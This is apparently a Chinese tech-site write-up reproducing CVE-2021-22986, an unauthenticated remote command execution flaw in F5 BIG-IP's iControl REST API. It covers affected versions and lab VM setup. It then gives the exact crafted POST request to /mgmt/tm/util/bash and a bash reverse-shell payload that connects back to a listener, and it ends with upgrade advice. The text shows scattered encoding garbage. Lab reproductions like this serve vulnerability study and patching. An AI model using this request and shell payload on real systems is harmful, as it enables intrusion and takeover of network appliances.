F5 BIG-IP代碼執(zhí)行漏洞CVE-2021-22986怎么分析
這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)F5 BIG-IP代碼執(zhí)行漏洞CVE-2021-22986怎么分析�,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲��。
0x00簡介
F5 BIG-IP 是美國``F5公司一款集成流量管理�����、DNS���、出入站規(guī)則�、web應(yīng)用防火墻��、web網(wǎng)關(guān)���、負(fù)載均衡等功能的應(yīng)用交付平臺��。
0x01漏洞概述
F5 BIG-IP/BIG-IQ iControl REST 未授權(quán)遠(yuǎn)程代碼執(zhí)行漏洞中��,未經(jīng)身份驗(yàn)證的攻擊者可通過iControl REST接口�����,構(gòu)造惡意請求�����,執(zhí)行任意系統(tǒng)命令�。
0x02影響版本
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
0x03環(huán)境搭建
1、 本次漏洞環(huán)境使用F5 16.0.0版本進(jìn)行搭建����,F(xiàn)5下載地址:
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.0
2、 注冊一個F5賬號�,訪問下載鏈接,選擇相應(yīng)版本進(jìn)行下載并同意條款
3���、選擇VMware格式的下載文件,然后選擇下載地區(qū)這里選擇離得近得下載即可
4��、下載完成后����,使用VMwear導(dǎo)入安裝
VMwear左上角‘文件’->‘打開‘選擇下載好的文件
5、選擇同意許可����,選擇安裝位置
6、配置方面看自己的選擇導(dǎo)入后啟動即可系統(tǒng)默認(rèn)賬戶:root/default登陸后需要修改默認(rèn)密碼
7����、配置完成后打開虛擬機(jī)輸入初始密碼�,會提示修改密碼 //需要修改強(qiáng)密碼
8�����、修改完成密碼后輸入config設(shè)置IP
9�、在瀏覽器訪問此地址需要使用https://your-ip
10、登陸賬號為admin登陸密碼為之前虛擬機(jī)設(shè)置得密碼��,登陸之后需要修改一次密碼 需為強(qiáng)密碼
0x04漏洞復(fù)現(xiàn)
1����、首先訪問以下url,然后使用Burp進(jìn)行抓包并發(fā)送到Repeater(重放)模塊
https://your-ip/mgmt/tm/util/bash
2��、修改數(shù)據(jù)包GET為POST并在添加上X-F5-Auth-Token字段和Authorization
X-F5-Auth-Token字段值為空
Authorization: Basic YWRtaW46QVNhc1M= 后面使用basse64加密了解碼出來為admin:ASasS
3���、在包內(nèi)添加以下代碼執(zhí)行命令�����,查看id�,添加完成后發(fā)送包
{"command":"run","utilCmdArgs":"-c id"}
4��、既然可以執(zhí)行命令,來反彈shell���,使用kali監(jiān)聽
{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/172.16.1.127/7765 0>&1'"}
0x05修復(fù)方式
1���、建議將F5 BIG-IP / BIG-IQ 升級至安全版本。
上述就是小編為大家分享的F5 BIG-IP代碼執(zhí)行漏洞CVE-2021-22986怎么分析了��,如果剛好有類似的疑惑���,不妨參照上述分析進(jìn)行理解�����。如果想知道更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道���。
